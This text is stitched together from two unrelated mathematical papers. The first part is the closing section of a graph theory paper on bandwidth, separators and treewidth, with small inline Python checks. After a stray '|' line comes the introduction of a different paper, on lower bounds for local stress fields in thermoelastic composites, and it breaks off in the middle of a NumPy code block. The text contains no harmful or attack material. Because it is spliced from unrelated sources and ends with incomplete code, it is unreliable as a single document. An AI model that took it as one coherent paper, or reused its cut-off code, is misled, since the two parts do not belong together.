P_{j'})=e(V_{i^*,j},V_{i^*,j'})=0$ for all $j,j'\in[b_{i^*}]$. Trivially
$e(R_j\dot\cup P_j,R_{j'}\dot\cup P_{j'})=0$ for all $j\in[b]$ and $b_{i^*}<j'\le b$
and therefore we get condition~\ref{it:dec:ii} of Lemma~\ref{lem:decomposition}.
Moreover, condition~\ref{it:dec:iii} is satisfied by the definition of the sets
$P_j$ and $R_j$ above. To verify condition~\ref{it:dec:i} note that
$|R_j|\le|V_{i^*,j}|\le2n/b=r$ for all $j\in[b_{i^*}]$ by the choice of~$i^*$ and
$|R_j|=0$ for all $b_{i^*}<j\le b$. Accordingly we can apply
Lemma~\ref{lem:decomposition} and infer that
\begin{equation}\label{eq:sep-band:bdw}
\bdw(G) \le 2\left(|S|+|P|+\frac{2n}{b}\right).
\end{equation}
In order to establish the desired bound on the bandwidth, we thus need to show
that $|S|+|P| \le n/\beta$. We first estimate the size of $S$. By
Claim~\ref{cl:sep-band} at most $x_S\le b-1$ separators have been extracted in
total, which implies
\begin{equation}\label{eq:sep-band:sep}
|S|\le x_S\cdot\s(G)\le(b-1)\s(G).
\end{equation}
Furthermore all vertices $v\in P$ satisfy $\dist_G(v,S)\le \lfloor b/2\rfloor-1$
by definition. As~$G$ has maximum degree $\Delta$ there are at most
$|S|(\Delta^{\lfloor b/2\rfloor}-1)/(\Delta-1)$ vertices $v\in V \setminus S$
with this property and hence
\begin{equation*}\begin{split}
|S| + |P|
&\le|S| \left(1+\frac{\Delta^{\lfloor b/2\rfloor}-1}{\Delta-1}\right)
\le |S| \frac{\Delta^{\beta/2}}{\Delta-3/2}\\
&\le \frac{(b-1) \s(G)}{(\Delta-3/2)} \sqrt{\frac{n}{\s(G)}}
= \frac{(b-1) n}{(\Delta-3/2)} \sqrt{\frac{\s(G)}{n}}
\end{split}\end{equation*}
where the second inequality holds for any $\Delta\ge3$ and $b\ge6$ and the third
inequality follows from~\eqref{eq:sep-band:bt} and~\eqref{eq:sep-band:sep}.
It is easy to verify that for any $\Delta\ge3$ and $x\ge\Delta^6$ we have
$(\Delta-3/2)\sqrt{x}\ge\tfrac98\log^2_{\Delta} x$. This together
with~\eqref{eq:sep-band:bt} gives $(\Delta-3/2)\sqrt{n/\s(G)}\ge\tfrac98\beta^2$
and hence we get
\begin{align}\label{eq:sep-band:SP}
|S| + |P| \le \frac{8(b-1) n}{9\beta^2}\,.
\end{align}
As $6\le b = \lfloor\beta\rfloor$ it is not difficult to check that
\[
\frac{8(b-1)}{9\beta^2} + \frac 2b \le\frac{3}{\beta} \,.
\]
Together with~\eqref{eq:sep-band:bdw} and~\eqref{eq:sep-band:SP} this gives our
bound.
It remains to prove Claim~\ref{cl:sep-band}. Notice that the process of
repeatedly separating $G$ and its subgraphs can be seen as a binary tree~$T$
on vertex set~$W$ whose internal nodes represent the extraction of a separator
$S_{i,k}$ for some $i$ (and thus the separation of a subgraph of $G$ into two sets
$V_{i,j}$ and $V_{i,j'}$) and whose leaves represent the sets $V_{i,j}$ that
are of size at most $2n/b$. Clearly the number of leaves of $T$ is $b_{i^*}$
and the number of internal nodes is $x_S$. As $T$ is a binary tree we conclude
$x_S=b_{i^*}-1$ and thus it suffices to show that $T$ has at most $b$ leaves in
order to establish the claim. To this end we would like to apply
Proposition~\ref{prop:tree}. Label an internal node of $T$ that
represents a separator $S_{i,k}$ with $|S_{i,k}|/n$, a leaf representing $V_{i,j}$ with
$|V_{i,j}|/n$ and denote the resulting labelling by $\ell$. Clearly we have
$\sum_{w\in W}\ell(w)=1$. Moreover we claim that
\begin{equation}\label{eq:sep-band:ell}
\ell(w)+\sum_{u\in L(w)}\ell(u)\ge|L(w)|/b
\qquad\text{for all $w\in W$}
\end{equation}
where $L(w)$ denotes the set of leaves that are children of $w$. Indeed, let
$w\in W$, notice that $|L(w)|\le 2$ as $T$ is a binary tree, and let $u$ and
$u'$ be the two children of $w$. If $|L(w)|=0$ we are done. If $|L(w)|>0$ then
$w$ represents an $(\s(G),2/3)$-separator $S(w):=S_{i,k}$ that separated a graph
$G[V(w)]$ with $V(w):=V_{i-1,j}$ and $|V(w)|> 2n/b$ into two sets $U(w):=V_{i,j'}$ and
$U'(w):=V_{i,j'+1}$ such that
$|U(w)|+|U'(w)|+|S(w)|=|V(w)|$. In the case that $|L(w)|=2$ this
implies
\begin{equation*}
\ell(w)+\ell(u)+\ell(u')=\frac{|S(w)|+|U(w)|+|U'(w)|}{n}
=\frac{|V(w)|}{n}
\ge 2/b
\end{equation*}
and thus we get~\eqref{eq:sep-band:ell}. If $|L(w)|=1$ on the other hand then,
without loss of generality, $u$ is a leaf of $T$ and $|U'(w)|>2n/b$. Since
$S(w)$ is an $(\s(G),2/3)$-separator, however, we know that $|V(w)|\ge\frac32|U'(w)|$ and
hence
\begin{equation*}\begin{split}
\ell(w)+\ell(u)&=\frac{|S(w)|+|U(w)|}{n}
=\frac{|S(w)|+|V(w)|-|U'(w)|-|S(w)|}{n} \\
&\ge\frac{\frac32|U'(w)|-|U'(w)|}{n}
\ge\frac{\frac12(2n/b)}{n}=\frac1b
\end{split}\end{equation*}
which also gives~\eqref{eq:sep-band:ell} in this case.
Therefore we can apply Proposition~\ref{prop:tree} and infer that $T$ has at
most $b$ leaves as claimed.
\end{proof}
\subsection{Boundedness}\label{sec:bound}
In this section we study the relation between boundedness, bandwidth and
treewidth. We first give a proof of Proposition~\ref{prop:band-bound}.
\begin{proof}[of Proposition~\ref{prop:band-bound}]
We have to show that for every graph $G$ and every $\eps>0$
the inequality $b_{\eps}(G) \le 2 \bdw(G) / \eps$ holds.
Suppose that $G$ has $n$ vertices and let $\sigma: V \to [n]$ be an
arbitrary labelling of $G$.
Furthermore assume that $V' \subseteq V$
with $|V'| = b_{\eps}(G)$ induces an $\eps$-expander in $G$.
Define $V^*\subset V'$ to be the first $b_{\eps}(G)/2=|V'|/2$ vertices of $V'$
with respect to the ordering $\sigma$. Since $V'$ induces an $\eps$-expander in
$G$ there must be at least $\eps b_{\eps}(G)/2$ vertices in $N^*:=N(V^*)\cap V'$.
Let $u$ be the vertex in $N^*$
with maximal $\sigma(u)$ and $v\in V^*\cap N(u)$. As $u\not\in V^*$ and
$\sigma(u')>\sigma(v')$ for all $u'\in N^*$ and $v'\in V^*$ by the choice of
$V^*$ we have $|\sigma(u)-\sigma(v)|\ge|N^*|\ge\eps b_{\eps}(G)/2$.
Since this is true for every labelling $\sigma$ we can deduce
that $b_{\eps}(G) \le 2\bdw(G) / \eps$.
\end{proof}
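The pigeonhole step of this proof can be illustrated numerically. A clique is a $1$-expander in the sense used here (every at-most-half-sized subset has the remaining vertices as its neighbourhood), so any labelling of a graph containing a clique $V'$ must stretch some clique edge over at least $|V'|/2$ positions. A Python sketch checking this exhaustively for a small clique:

```python
from itertools import combinations, permutations

m = 6                                   # clique on vertices 0..m-1
clique_edges = list(combinations(range(m), 2))

def max_stretch(sigma):
    """Largest label gap over an edge of the clique under labelling sigma."""
    return max(abs(sigma[u] - sigma[v]) for u, v in clique_edges)

# Over all labellings of the clique by distinct positions, the maximum
# edge stretch is at least eps * m / 2 with eps = 1.
assert all(max_stretch(dict(enumerate(p))) >= m / 2
           for p in permutations(range(m)))
```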
The remainder of this section is devoted to the proof of
Theorem~\ref{thm:bound-trw}. We will use the following lemma which establishes
a relation between boundedness and certain separators.
\begin{lemma}[bounded$\to$separator] \label{lem:bound-sep}
Let $G$ be a graph on $n$ vertices and let $\eps > 0$. If $G$ is
$(n/2,\eps)$-bounded then $G$ has a $(2\eps n/3, 2/3)$-separator.
\end{lemma}
\begin{proof}
Let $G = (V,E)$ with $|V|=n$ be $(n/2,\eps)$-bounded for $\eps>0$.
It follows that every subset $V' \subseteq V$ with $|V'|
\ge n/2$ induces a subgraph $G' \subseteq G$ with the following property:
there is $W \subseteq V'$ such that $|W| \le |V'|/2$ and $|N_{G'}(W)| \le \eps
|W|$.
We use this fact to construct a $(2\eps n/3, 2/3)$-separator in the following
way:
\begin{enumerate}[leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item Define $V_1:=V$ and $i:=1$.
\item\label{it:Sep_Konstr_1} Let $G_i:=G[V_i]$.
\item\label{it:Sep_Konstr_2} Find a subset $W_i \subseteq V_i$ with $|W_i| \le
|V_i|/2$ and $|N_{G_i}(W_i)| \le \eps |W_i|$.
\item Set $S_i:= N_{G_i}(W_i)$, $V_{i+1}:=V_i \setminus (W_i \cup S_i)$.
\item If $|V_{i+1}| \ge\frac23n$ then set $i:=i+1$ and go to step (\ref{it:Sep_Konstr_1}).
\item Set $i^*:=i$ and return
$$
A:=\bigcup_{i=1}^{i^*} W_i, \quad B:= V_{i^*+1}, \quad S:=\bigcup_{i=1}^{i^*} S_i .
$$
\end{enumerate}
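A Python sketch of this loop, run on a hypothetical cycle graph, which is a poor expander: the oracle of step~3 can simply return a short arc, whose neighbourhood has at most two vertices. The assertions check the properties $|S|\le\frac23\eps n$, $|A|\le\frac23 n$, $|B|<\frac23 n$, and that $S$ separates $A$ from $B$; the arc length $10$ and the values of $n$ and $\eps$ are arbitrary choices:

```python
n, eps = 60, 0.2
cycle_adj = {v: {(v - 1) % n, (v + 1) % n} for v in range(n)}

A, S = [], []
Vi = list(range(n))                     # current V_i, kept as a cycle arc
while True:
    W = Vi[:10]                         # step 3: a short arc, |W| <= |V_i|/2
    Ni = {u for w in W for u in cycle_adj[w] if u in set(Vi)} - set(W)
    assert len(Ni) <= eps * len(W)      # oracle guarantee |N_{G_i}(W)| <= eps|W|
    A += W
    S += list(Ni)
    Vi = [v for v in Vi if v not in set(W) | Ni]
    if len(Vi) < 2 * n / 3:
        break
B = Vi

assert len(S) <= (2 / 3) * eps * n
assert len(A) <= 2 * n / 3 and len(B) < 2 * n / 3
# S separates A from B: no edge of the cycle joins A and B
assert not any(u in set(B) for a in A for u in cycle_adj[a])
```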
This construction obviously returns a partition $V = A \dot\cup B \dot\cup S$
with $|B| <\frac23n$.
Moreover,
$|V_{i^*}| \ge \frac23 n$ and $|W_{i^*}| \le |V_{i^*}|/2$ and hence
\begin{equation*}\begin{split}
|A| = n - |B| - |S| = n - |V_{i^*+1}| - |S| = \\
n - ( |V_{i^*}| - |W_{i^*}| - |S_{i^*}|) - |S| \le
n - \frac{|V_{i^*}|}{2} \le \frac23 n.
\end{split}\end{equation*}
The upper bound on $|S|$ follows easily since
$$
|S| = \sum_{i=1}^{i^*} |N_{G_i}(W_i)| \le \sum_{i=1}^{i^*} \eps|W_i|
= \eps |A| \le \frac23 \eps n.
$$
It remains to show that $S$ separates $G$. This is indeed the case as
$N_G(A) \subseteq S$ by construction and thus $E(A, B) = \emptyset$.
\end{proof}
Now we can prove Theorem~\ref{thm:bound-trw}. As remarked earlier,
Grohe and Marx~\cite{GroMar} independently gave a proof of an equivalent result
which employs similar ideas but does not use separators explicitly.
\begin{proof}[of Theorem~\ref{thm:bound-trw}]
Let $G=(V,E)$ be a graph on $n$ vertices, $\eps > 0$, and let $b \ge
b_{\eps}(G)$.
It follows immediately from the definition of boundedness that every subgraph $G'
\subseteq G$ with $G'=(V',E')$ and $|V'| \ge 2b$ also has $b_{\eps}(G') \le b$.
We now prove Theorem~\ref{thm:bound-trw} by induction on the size of $G$.
The relation
$\trw(G) \le 2 \eps n + 2b$ trivially holds if $n\le 2b$. So let $G$ have $n >
2b$ vertices and assume that the theorem holds for all graphs with less than $n$
vertices. Then $G$ is $(b, \eps)$-bounded and thus has a $(2\eps
n/3,2/3)$-separator $S$ by Lemma~\ref{lem:bound-sep}. Assume that $S$ separates
$G$ into the two subgraphs $G_1=(V_1,E_1)$ and $G_2=(V_2,E_2)$. Let
$(\mathcal{X}_1,T_1)$ and $(\mathcal{X}_2,T_2)$ be tree decompositions of $G_1$
and $G_2$, respectively, such that $\mathcal{X}_1\cap\mathcal{X}_2=\emptyset$. We
use them to construct a tree decomposition $(\mathcal{X},T)$ of $G$ as follows.
Let $\mathcal{X} = \{ X_i \cup S : X_i \in\mathcal{X}_1\} \cup \{ X_i \cup S :
X_i \in\mathcal{X}_2\}$ and $T = (I_1 \cup I_2, F = F_1 \cup F_2 \cup \{e\})$
where $e$ is an arbitrary edge between the two trees. This is indeed a tree
decomposition of $G$: Every vertex $v \in V$ belongs to at least one $X_i \in
\mathcal{X}$ and for every edge $\{v,w\} \in E$ there exists $i \in I$ (where $I$
is the index set of $\mathcal{X}$) with $\{v,w\} \subseteq X_i$. This is trivial
for $\{v,w\} \subseteq V_i$ and follows from the definition of $\mathcal{X}$ for
$v \in S$ and $w \in V_i$. Since $S$ separates $G$ there are no edges $\{v,w\}$
with $v \in V_1$ and $w \in V_2$. For the same reason the third property of a
tree decomposition holds: if $j$ lies on the path from $i$ to $k$ in $T$, then
$X_i \cap X_k \subseteq X_j$ as the intersection is $S$ if $X_i, X_k$ are subsets
of $V_1$ and $V_2$ respectively.
We have seen that $(\mathcal{X},T)$ is a tree decomposition of $G$ and
can estimate its width as follows: $\trw(G) \le \max\{\trw(G_1), \trw(G_2)\} +
|S|$. With the induction hypothesis we get
\begin{align*}
\trw(G) &\le \max\{2\eps\cdot|V_1|+2b,\,\,2\eps\cdot |V_2|+2b\} + |S|\\
&\le 2 \eps n + 2b,
\end{align*}
where the second inequality follows from $|V_i| \le (2/3)n$
and $|S|\le (2\eps n)/3$.
\end{proof}
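The merged decomposition $(\mathcal{X},T)$ can be checked mechanically on a small example: a hypothetical path on seven vertices with separator $S=\{3\}$, where each part carries its trivial path decomposition and the two bag-trees are joined by one edge $e$ (Python sketch):

```python
# Path 0-1-2-3-4-5-6, separator S = {3}, parts V1 = {0,1,2}, V2 = {4,5,6}.
edges = [(i, i + 1) for i in range(6)]
S = {3}
bags1 = [{0, 1}, {1, 2}]                # path decomposition of G[V1]
bags2 = [{4, 5}, {5, 6}]                # path decomposition of G[V2]

# Merged decomposition: add S to every bag; the tree is the two bag-paths
# joined by one edge e (here: last bag of bags1 to first bag of bags2).
bags = [b | S for b in bags1] + [b | S for b in bags2]

# every edge of G lies in some bag
assert all(any({u, v} <= b for b in bags) for u, v in edges)
# every vertex appears in a contiguous run of bags (the bag tree is a path)
for v in range(7):
    idx = [i for i, b in enumerate(bags) if v in b]
    assert idx == list(range(idx[0], idx[-1] + 1))
# width = max bag size - 1 <= max(width1, width2) + |S|
assert max(len(b) for b in bags) - 1 <= 1 + len(S)
```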
\section{Applications}
\label{sec:appl}
For many interesting bounded degree graph classes (non-trivial) upper bounds
on the bandwidth are not at hand. A wealth of results however has been obtained
about the existence of sublinear separators. This illustrates the importance
of Theorem~\ref{thm:main}. In this section we will give examples of such
separator theorems and provide applications of them in
conjunction with Theorem~\ref{thm:main}.
\subsection{Separator theorems}\label{subsec:separators}
A classical result in the theory of planar graphs concerns the existence of
separators of size~$2\sqrt{2n}$ in any planar graph on~$n$ vertices proved by
Lipton and Tarjan~\cite{LipTar} in 1977. Clearly, together with
Theorem~\ref{thm:sep-band} this result implies the following theorem.
\begin{corollary}
\label{cor:planar}
Let $G$ be a planar graph on $n$ vertices with maximum degree at
most~$\Delta\ge 2$. Then the bandwidth of $G$ is bounded from above by
\[
\bdw(G) \le \frac{15n}{\log_\Delta(n)}.
\]
\end{corollary}
It is easy to see that the bound in Corollary~\ref{cor:planar} is sharp up to
the multiplicative constant -- since the bandwidth of any graph $G$ is bounded from below by
$(n-1)/\mbox{diam}(G)$, it suffices to consider for example the complete binary tree on $n$ vertices.
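A quick numerical illustration of this sharpness argument (Python sketch): for the complete binary tree of depth $d$ we have $n=2^{d+1}-1$, maximum degree $3$, and diameter $2d$, so the lower bound $(n-1)/\mathrm{diam}(G)$ already matches the upper bound of Corollary~\ref{cor:planar} up to a constant factor:

```python
import math

for d in range(5, 16):
    n = 2 ** (d + 1) - 1                # vertices of the complete binary tree
    lower = (n - 1) / (2 * d)           # bdw(G) >= (n-1)/diam(G), diam = 2d
    upper = 15 * n / math.log(n, 3)     # Corollary bound with Delta = 3
    assert lower <= upper
    # the two bounds differ only by a bounded factor
    assert upper / lower <= 100
```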
Corollary~\ref{cor:planar} is used in~\cite{CDMW} to infer a result about the
geometric realisability of planar graphs $G=(V,E)$ with $|V|=n$ and $\Delta(G)\le\Delta$.
This motivates why we want to consider some generalisations of the planar
separator theorem in the following. The first such result is due to Gilbert,
Hutchinson, and Tarjan~\cite{GilHutTar} and deals with graphs of arbitrary
genus.
\footnote{Again, the separator theorems we refer to bound the size of a
separator in $G$. Since the class of graphs with genus less than $g$
(or, respectively, of $H$-minor free graphs) is closed under taking subgraphs however, this
theorem can also be applied to such subgraphs and thus the bound on~$\s(G)$
follows.}
\begin{theorem}[\cite{GilHutTar}]
\label{thm:sep-genus}
An $n$-vertex graph $G$ with genus $g \ge 0$ has separation
number $\s(G) \le6\sqrt{gn}+2\sqrt{2n}$.
\end{theorem}
For fixed $g$ the class of all graphs with genus at most $g$ is closed under
taking minors. Here $H$ is a minor of $G$ if it can be obtained from a
subgraph of~$G$ by a sequence of edge deletions and contractions. A graph $G$
is called $H$-minor free if $H$ is no minor of $G$. The famous graph minor theorem
by Robertson and Seymour~\cite{RobSeyXX} states that any minor closed class
of graphs can be characterised by a finite set of forbidden minors (such as
$K_{3,3}$ and $K_5$ in the case of planar graphs). The next separator
theorem by Alon, Seymour, and Thomas~\cite{AloSeyTho} shows that already
forbidding one minor enforces a small separator.
\begin{theorem}[\cite{AloSeyTho}]
\label{lem:sep-minor}
Let $H$ be an arbitrary graph. Then any $n$-vertex graph $G$ that is
$H$-minor free has separation number $\s(G) \le |H|^{3/2}\sqrt{n}$.
\end{theorem}
We can apply these theorems to draw the following conclusion concerning the
bandwidth of bounded-degree graphs with fixed genus or some fixed forbidden
minor from Theorem~\ref{thm:sep-band}.
\begin{corollary}\label{cor:sep}
Let $g$ be a positive integer, let $\Delta\ge2$, let $H$ be
an $h$-vertex graph, and let $G$ be an $n$-vertex graph with maximum degree
$\Delta(G)\le\Delta$.
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item If $G$ has genus $g$ then $\bdw(G)\le 15n/\log_{\Delta}(n/g)$.
\item If $G$ is $H$-minor free then $\bdw(G)\le 12n/\log_{\Delta}(n/h^3)$.
\end{enumerate}
\end{corollary}
\subsection{Embedding problems and universality}\label{subsec:universal}
A graph $H$ that contains copies of all graphs $G\in\mbox{${ \mathcal G }$}$ for some class of
graphs $\mbox{${ \mathcal G }$}$ is called \emph{universal for~$\mbox{${ \mathcal G }$}$}.
The construction of sparse universal graphs for certain families $\mbox{${ \mathcal G }$}$ has
applications in VLSI circuit design and was extensively studied (see,
e.g., \cite{AloCap} and the references therein).
In contrast to these results our focus is not on
minimising the number of edges of $H$,
but instead we are interested in giving a relatively
\emph{simple} criterion for
universality for $\mbox{${ \mathcal G }$}$ that is satisfied by \emph{many} graphs~$H$ of the
same order as the largest graph in $\mbox{${ \mathcal G }$}$.
The setting with which we are concerned here are embedding results that
guarantee that a bounded-degree graph $G$
can be embedded into a graph $H$ with sufficiently high minimum
degree, even when $G$ and $H$ have the same number of vertices.
Dirac's theorem~\cite{Dir} concerning the existence of Hamiltonian cycles in
graphs of minimum degree $n/2$ is a classical example for theorems of this type.
It was followed by results of Corr\'adi and
Hajnal~\cite{CorHaj}, Hajnal and Szemer\'edi~\cite{HajSze} about embedding
$K_r$-factors, and more recently by a series of theorems due to Koml\'os, Sark\"ozy, and
Szemer\'edi and others
which deal with powers of Hamiltonian cycles, trees, and $H$-factors (see,
e.g., the survey~\cite{KOSurvey}). Along the lines of these results the
following unifying conjecture was made by Bollob\'as and Koml\'os~\cite{Kom99}
and recently proved by B\"ottcher, Schacht, and Taraz~\cite{BST09}.
\begin{theorem}[\cite{BST09}]
\label{thm:bolkom}
For all $r,\Delta\in\mathbb{N}$ and $\gamma>0$, there exist constants $\beta>0$ and
$n_0\in\mathbb{N}$ such that for every $n\geq n_0$ the following holds.
If~$G$ is an $r$-chromatic graph on~$n$ vertices with $\Delta(G) \leq \Delta$ and
bandwidth at most $\beta n$ and if~$H$ is a graph on~$n$ vertices with minimum degree
$\delta(H) \geq (\frac{r-1}{r}+\gamma)n$, then $G$ can be embedded into $H$.
\end{theorem}
The proof of Theorem~\ref{thm:bolkom} heavily uses the bandwidth constraint
insofar as it constructs the required embedding sequentially, following the
ordering given by the vertex labels of $G$. Here it is of course beneficial that
the neighbourhood of every vertex $v$ in $G$ is confined to the $\beta n$
vertices which immediately precede or follow $v$.
Also, it is not difficult to see that the statement in Theorem~\ref{thm:bolkom}
becomes false without the constraint on the bandwidth: Consider $r=2$, let $G$ be
a random bipartite graph with bounded maximum degree and let $H$ be the graph
formed by two cliques of size $(1/2+\gamma)n$ each, which share exactly $2\gamma
n$ vertices. Then $H$ cannot contain a copy of $G$, since in $G$ every vertex set
of size $(1/2-\gamma)n$ has more than $2\gamma n$ neighbours. The reason for this
obstruction is again that $G$ has good expansion properties.
On the other hand, Theorem~\ref{thm:main} states that in bounded degree graphs,
the existence of a big expanding subgraph is in fact the only obstacle which can
prevent sublinear bandwidth and thus the only possible obstruction for a
universality result as in Theorem~\ref{thm:bolkom}. More precisely we immediately
get the following corollary from Theorem~\ref{thm:main}.
\begin{corollary}
If the class $\mbox{${ \mathcal C }$}$ meets one (and thus all) of the conditions in
Theorem~\ref{thm:main}, then the following is also true.
For every $\gamma>0$ and $r\in\field{N}$ there exists $n_0$ such that for all $n\ge
n_0$ and for every graph $G\in\mbox{${ \mathcal C }$}_n$ with chromatic number $r$ and for every
graph $H$ on $n$ vertices with minimum degree at least
$(\frac{r-1}{r}+\gamma)n$, the graph $H$ contains a copy of $G$.
\end{corollary}
By Corollary~\ref{cor:planar} we infer as a special case that all sufficiently
large graphs with minimum degree $(\frac34+\gamma)n$ are universal for the class
of bounded-degree planar graphs. Universal graphs for bounded degree planar
graphs have also been studied in~\cite{BCLR,Cap}.
\begin{corollary}\label{cor:planar-univers}
For all $\Delta\in\mathbb{N}$ and $\gamma>0$, there exists $n_0\in\mathbb{N}$
such that for every $n\geq n_0$ the following holds:
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item
Every $3$-chromatic planar graph on $n$ vertices with maximum degree at most
$\Delta$ can be embedded into every graph on $n$ vertices with minimum degree at
least $(\frac23+\gamma)n$.
\item
Every planar graph on $n$ vertices with maximum degree at most $\Delta$ can be
embedded into every graph on $n$ vertices with minimum degree at least
$(\frac34+\gamma)n$.
\end{enumerate}
\end{corollary}
This extends a result by K{\"u}hn, Osthus, and Taraz~\cite{KueOstTar}, who
proved that for every graph $H$ with minimum degree at least $(\frac23+\gamma)n$
\emph{there exists a particular} spanning triangulation $G$ that can be
embedded into $H$. Using Corollary~\ref{cor:sep} it is moreover possible to
formulate corresponding generalisations for graphs of fixed genus and for
$H$-minor free graphs for any fixed~$H$.
\section{Acknowledgement}
The first author would like to thank David Wood for fruitful discussions
in an early stage of this project.
In addition we thank two anonymous referees for their helpful suggestions.
\bibliographystyle{amsplain}
|
\label{Introduction}
Over the last century major strides have been made in the characterization of effective constitutive laws relating average fluxes to average gradients inside random heterogeneous media; see, for example, \cite{Hash, Maxwell04, Willis, Milton, NNH, Rayleigh}. However, much less is known about the pointwise behavior of local flux and gradient fields inside random media. While it is true that efficient numerical methods capable of resolving local fields are available for prescribed microstructures, it is also true that for most applications only a partial statistical description of the microstructure is available. Thus for these cases one must resort to bounds or approximations for the local fields that are based upon the available statistical descriptors of the microgeometry and the applied macroscopic loading.
Bounds are useful as they provide a means to quantitatively assess load transfer across length scales relating the excursions of the local fields to applied macroscopic loads. Moreover, they provide explicit criteria on the applied loads that are necessary for failure initiation inside statistically defined heterogeneous media \cite{AlaliLipton}. In this paper we develop lower bounds on local field properties for statistically defined two phase microstructures when only the volume fraction of each phase is known.
Here the focus is on lower bounds, since volume constraints alone do not preclude the existence of microstructures with rough interfaces for which the $L^p$ norms of local fields are divergent; see \cite{SeminalMilton}, \cite{faraco}, and also \cite{leonetinesi}.
We present a methodology for bounding the $L^p$ norms, $2\leq p\leq\infty$, of the local hydrostatic stress field inside random media made up of two thermoelastic materials. The method is used to obtain new optimal lower bounds that are given by explicit formulas expressed in terms of the applied thermal and mechanical loading, coefficients of thermal expansion, elastic properties, and volume fractions. We show that these bounds are the best possible in that they are attained by the local fields inside the coated sphere assemblage originally introduced in \cite{hscoated}.
It has been known since 1963 that the coated spheres microstructure exhibits extreme effective elastic properties \cite{hashin}. However, it was discovered only recently in \cite{Lipstress}, \cite{Lipstrain} that this geometry supports extreme local fields that minimize the maximum local hydrostatic field over all two phase elastic mixtures in fixed volume fractions. More recently, several scenarios have been identified for which, in the absence of thermal stresses, these microstructures attain lower bounds on the total local stress field inside each material when the composite is subjected to mechanical loading; see \cite{AlaliLipton}.
In this paper we consider mixtures of two thermoelastic materials with shear and bulk moduli specified by $\mu_1$, $k_1$, $\mu_2$, $k_2$ and coefficients of thermal expansion given by $h_1$ and $h_2$. New lower bounds are presented for elastically well-ordered phases, for which $k_1>k_2$ and $\mu_1>\mu_2$, as well as for non-well-ordered phases, for which $k_2>k_1$ and $\mu_1>\mu_2$. For each of these cases we consider both macroscopic mechanical and thermal loads and present bounds that hold for $h_1>h_2$ and for $h_2>h_1$. The set of bounds and optimal microstructures for the well-ordered case are listed in Section 3 and optimal lower bounds for the non-well-ordered case are listed in Section 4.
The methodology for deriving the bounds is presented in Section 5.
The optimal bounds and the associated coated sphere microstructures given in Sections 3 and 4 show that there are combinations of applied stress and imposed temperature change for which the local hydrostatic stress inside the connected phase of the coated sphere assemblage vanishes identically. Other loading combinations are seen to cause the stress inside the included phase of the coated sphere assemblage to vanish identically.
Thus for these cases the applied hydrostatic stress is converted into a pure local shear stress inside a preselected phase.
Recent related work provides optimal lower bounds on local fields in the absence of thermal loads.
The work presented in \cite{AlaliLipton} provides new optimal lower bounds on both the local shear stress and the local hydrostatic component of stress for random media subjected to a series of progressively more general applied macroscopic stresses. These bounds are explicit and given in terms of volume fractions, elastic constants of each phase, and the applied macroscopic stress.
Earlier work considers random two phase elastic composites subject to imposed macroscopic hydrostatic stress and strain, see \cite{Lipstrain} and \cite{Lipstress}, as well as dielectric composites subjected to applied constant electric fields, see \cite{Lipelect}. Those efforts deliver optimal lower bounds on the $L^p$ norms of the hydrostatic components of local stress and strain fields, as well as the magnitude of the local electric field, for all $p$ in the range $2\leq p \leq \infty$. Other work examines the stress field around a single simply connected stiff elastic inclusion subjected to a remote constant stress at infinity \cite{Wheeler} and provides optimal lower bounds for the supremum of the
maximum principal stress. The work presented in \cite{GrabovskyandKohn} provides an optimal lower bound on the supremum of the maximum principal stress for two-dimensional periodic composites consisting of a single simply connected elastically stiff inclusion inside the period cell. The recent work of \cite{He} builds on the earlier work of \cite{Lipstrain, Lipstress} and develops new lower bounds on the
$L^p$ norm of the local stress and strain fields inside statistically isotropic two-phase elastic composites. However, to date those bounds have been shown to be optimal only for $p=2$; see \cite{He}. Their optimality for $p>2$ remains open. Optimal upper and lower bounds on the $L^2$ norm of local gradient fields
are established using integral representation formulas in \cite{lipsiama}.
We conclude by providing the notation and summation conventions used in this article. Contractions of
stress or strain fields $\sigma$ and $\epsilon$ are defined by
$\sigma:\epsilon=\sigma_{ij}\epsilon_{ij}$ and $|\sigma|^2=\sigma:\sigma$, where
repeated indices indicate summation. Products of fourth order
tensors $C$ and strain tensors $\epsilon$ are written as
$C\epsilon$ and are given by $[C\epsilon]_{ij}=C_{ijkl}\epsilon_{kl}$; and
products of stresses $\sigma$ with vectors ${\bf v}$ are
given by $[\sigma{\bf v}]_i=\sigma_{ij}v_j$. The fourth order identity
map on the space of stresses or strains is denoted by $\mathbf I$
and ${\mathbf
I}_{ijkl}=1/2(\delta_{ik}\delta_{jl}+\delta_{il}\delta_{jk})$. The
projection onto the hydrostatic part of $\sigma(\textbf{x})$ is denoted by
$\mathbb{P}^H$ and is given explicitly by
\begin{eqnarray}
\mathbb{P}^H_{ijkl}=\frac{1}{d}\delta_{ij}\delta_{kl}&\,\hbox{and}\,&\mathbb{P}^H\sigma(\textbf{x})=\frac{tr\,\sigma(\textbf{x})}{d}I.
\label{proj}
\end{eqnarray}
The projection onto the deviatoric part of $\sigma(\textbf{x})$ is denoted by
$\mathbb{P}^D$ and ${\mathbf I}=\mathbb{P}^H+\mathbb{P}^D$ with $\mathbb{P}^D\mathbb{P}^H=\mathbb{P}^H\mathbb{P}^D=0$. The tensor product between two vectors $\u$ and $\v$ is the matrix $\u\otimes\v$ with elements $[\u\otimes\v]_{ij}=u_i v_j$.
Last we denote the basis for the space of constant $3\times 3$ symmetric strain tensors by $\bar{\epsilon}^{kl}$ where $\bar{\epsilon}_{mn}^{kl}=\delta_{mk}\delta_{nl}$.
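The identities satisfied by $\mathbb{P}^H$ and $\mathbb{P}^D$ are easy to confirm numerically. The following NumPy sketch (illustrative only, not part of the analysis) assembles ${\mathbf I}$, $\mathbb{P}^H$, and $\mathbb{P}^D$ as fourth order arrays for $d=3$ and checks that $\mathbb{P}^H\sigma=(tr\,\sigma/d)I$ and that the two projections are complementary.

```python
import numpy as np

d = 3
delta = np.eye(d)
# Fourth order identity on symmetric tensors: I_{ijkl} = (d_ik d_jl + d_il d_jk)/2
I4 = 0.5 * (np.einsum('ik,jl->ijkl', delta, delta)
            + np.einsum('il,jk->ijkl', delta, delta))
# Hydrostatic projection: P^H_{ijkl} = d_ij d_kl / d
PH = np.einsum('ij,kl->ijkl', delta, delta) / d
PD = I4 - PH                                   # deviatoric projection

rng = np.random.default_rng(0)
sigma = rng.random((d, d))
sigma = 0.5 * (sigma + sigma.T)                # symmetric stress tensor

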